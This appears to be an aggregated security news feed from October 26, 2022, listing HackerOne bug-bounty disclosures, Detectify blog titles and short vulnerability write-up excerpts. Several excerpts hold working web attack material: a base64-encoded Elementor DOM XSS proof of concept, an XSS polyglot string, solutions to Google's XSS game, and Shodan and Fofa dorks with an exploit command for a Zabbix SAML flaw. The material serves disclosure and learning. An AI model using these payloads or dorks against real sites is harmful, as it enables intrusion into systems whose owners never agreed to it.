October 26, 2022 GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1690045 – Bounty: $1000 [Source]

October 26, 2022 GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1710575 – Bounty: $1800 [Source]

October 26, 2022 Cloudflare Public Bug Bounty disclosed a bug submitted by ydvanjali: https://hackerone.com/reports/1664974 – Bounty: $250 [Source]

October 26, 2022 Reddit disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1656380 – Bounty: $1000 [Source]

October 26, 2022 Informatica disclosed a bug submitted by isumitpatel: https://hackerone.com/reports/994612 [Source]

October 26, 2022 Nextcloud disclosed a bug submitted by bjoernv: https://hackerone.com/reports/1606961 – Bounty: $100 [Source]

October 26, 2022 TikTok disclosed a bug submitted by ckerha: https://hackerone.com/reports/1199965 – Bounty: $170 [Source]

October 26, 2022 Reddit disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1285081 – Bounty: $200 [Source]

October 26, 2022 Reddit disclosed a bug submitted by criptex: https://hackerone.com/reports/1661113 – Bounty: $5000 [Source]

October 26, 2022 Reddit disclosed a bug submitted by heckintosh: https://hackerone.com/reports/1606957 – Bounty: $100 [Source]

October 26, 2022 Cloudflare Public Bug Bounty disclosed a bug submitted by path_network: https://hackerone.com/reports/1636320 – Bounty: $500 [Source]

October 26, 2022 Cloudflare Public Bug Bounty disclosed a bug submitted by lohigowda: https://hackerone.com/reports/1675730 – Bounty: $250 [Source]

October 26, 2022 Flickr disclosed a bug submitted by stevejubs: https://hackerone.com/reports/1581258 – Bounty: $258 [Source]

October 26, 2022 Yelp disclosed a bug submitted by irfadps: https://hackerone.com/reports/1714970 [Source]

October 26, 2022 Judge.me disclosed a bug submitted by penguinshelp: https://hackerone.com/reports/1595905 – Bounty: $500 [Source]

October 26, 2022 Slack disclosed a bug submitted by security_warrior: https://hackerone.com/reports/1661310 – Bounty: $250 [Source]

October 26, 2022 Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1700276 – Bounty: $1125 [Source]

October 26, 2022 Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1632921 [Source]

October 26, 2022 Yelp disclosed a bug submitted by raja404: https://hackerone.com/reports/1712240 [Source]

October 26, 2022 8×8 disclosed a bug submitted by rajauzairabdullah: https://hackerone.com/reports/790846 [Source]

October 26, 2022 Yelp disclosed a bug submitted by qualwin3001: https://hackerone.com/reports/1707616 [Source]

October 26, 2022 Yelp disclosed a bug submitted by er_salil: https://hackerone.com/reports/1023773 [Source]

October 26, 2022 U.S. Dept Of Defense disclosed a bug submitted by thpless: https://hackerone.com/reports/1624152 – Bounty: $500 [Source]

October 26, 2022 Reddit disclosed a bug submitted by criptex: https://hackerone.com/reports/1051373 – Bounty: $5000 [Source]

October 26, 2022 Adobe disclosed a bug submitted by gdattacker: https://hackerone.com/reports/1661914 [Source]

October 26, 2022 MTN Group disclosed a bug submitted by possowski: https://hackerone.com/reports/1646248 [Source]

October 26, 2022 Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1663788 – Bounty: $1200 [Source]

October 26, 2022 Internet Bug Bounty disclosed a bug submitted by happyhacking123: https://hackerone.com/reports/1664019 – Bounty: $600 [Source]

October 26, 2022 The post New reward system to accelerate learning and growth on Detectify appeared first on Detectify Labs. [Source]

October 26, 2022 The post SSRF vulnerabilities and where to find them appeared first on Detectify Labs. [Source]

October 26, 2022 The post How To Hack Web Applications in 2022: Part 2 appeared first on Detectify Labs. [Source]

October 26, 2022 The post Module disclosures now available for hackers on Detectify Crowdsource appeared first on Detectify Labs. [Source]

October 26, 2022 The post Common Security Vulnerabilities in Core AWS Services: Exploitation and Mitigation appeared first on Detectify Labs. [Source]

October 26, 2022 The post Account hijacking using “dirty dancing” in sign-in OAuth-flows appeared first on Detectify Labs. [Source]

October 26, 2022 The post Hack with ‘goodfaith’ – A tool to automate and scale good faith hacking appeared first on Detectify Labs. [Source]

October 26, 2022 The post How to: Look for TLS private keys on Docker Hub appeared first on Detectify Labs. [Source]

October 26, 2022 The post Leveraging AWS QuickSight dashboards to visualize recon data appeared first on Detectify Labs. [Source]

October 26, 2022 The post How To Hack Web Applications in 2022: Part 1 appeared first on Detectify Labs. [Source]

October 26, 2022 – The DOM-based Reflected Cross-Site Scripting (XSS) vulnerability is in Elementor’s Elementor Website Builder plugin <= 3.5.5 versions.  This issue leads to: CVE 2022-29455 4websecurity.com already reported the vulnerability to tens of thousands websites that are using WordPress and this version of the plugin.  Reference:    – https://nvd.nist.gov/vuln/detail/CVE-2022-29455    – https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor    – https://www.rotem-bar.com/elementor * POC (Proof Of Concept): The payload is Base64 encoded: https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0= Decoded from…

October 26, 2022 In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Dork: shodan-query: http.favicon.hash:892542951 fofa-query: app=”ZABBIX-监控系统” && body=”saml” usage nuclei -l target.txt -tags zabbix python3 zabbix_session_exp.py -t https:target.com…

October 26, 2022 jaVasCript:/*-/*`/*`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/–!>x3csVg/<sVg/oNloAd=alert()//>x3e [Source]

October 26, 2022 Mostly, penetration testing can use the extensions for the purpose to locate the broken links and inform the client, and these extensions also help to determine whether a target website contains vulnerabilities that can lead to adversarial exploitations and sensitive information theft. Here are the different chrome extensions that are…

October 26, 2022 Hi guys ,This is Neil Harvey Miñano a Newbie security researcher from Philippine.This is my 1st write-up and also I am not good at XSS so forgive all mistakes.It was 04/20/2021 and my 1st day of bug hunting.I’m still newbie!Today I am gonna to Share a Reflected Xss vulnerability what…

October 26, 2022 Improper Access Control to Remote Code Execution (CVE-2020-8591) In this post. I will explain how I hacked a whole system by exploiting improper access control vulnerability in the popular java-based MaaS software “eG Manager” and how I can escalated it to execute code remotely. Impact The Improper Access Control weakness…

October 26, 2022 Speaking with the team at Open Bug Bounty was the highlight of her day for Aviva Zacks of Safety Detectives. She learned that their community-driven spirit is exactly what advantageously differentiates their project from the others out there. https://www.safetydetectives.com/blog/interview-open-bug-bounty/ [Source]

October 26, 2022 https://xss-game.appspot.com/ Level #1: Hello, world of XSShttps://xss-game.appspot.com/level1Solution: <script>alert(‘xss’)</script>hint: inspect the source code of the page Level #2: Persistence is keyhttps://xss-game.appspot.com/level2Solution: <img src=x onerror=alert(‘XSS’)>hint: “welcome” post contains HTML Level #3: That sinking feeling…https://xss-game.appspot.com/level3/frame#1Solution: https://xss-game.appspot.com/level3/frame#1′ onerror=’alert(“xss”)’> Level #4: Context mattershttps://xss-game.appspot.com/level4/frameSolution: timer=’);alert(‘xss Level #5: Breaking protocolhttps://xss-game.appspot.com/level5/frameSolution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(‘xss’) Level #6: Follow the Xhttps://xss-game.appspot.com/level6/frame#/static/gadget.jsSolution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert(‘xss’)…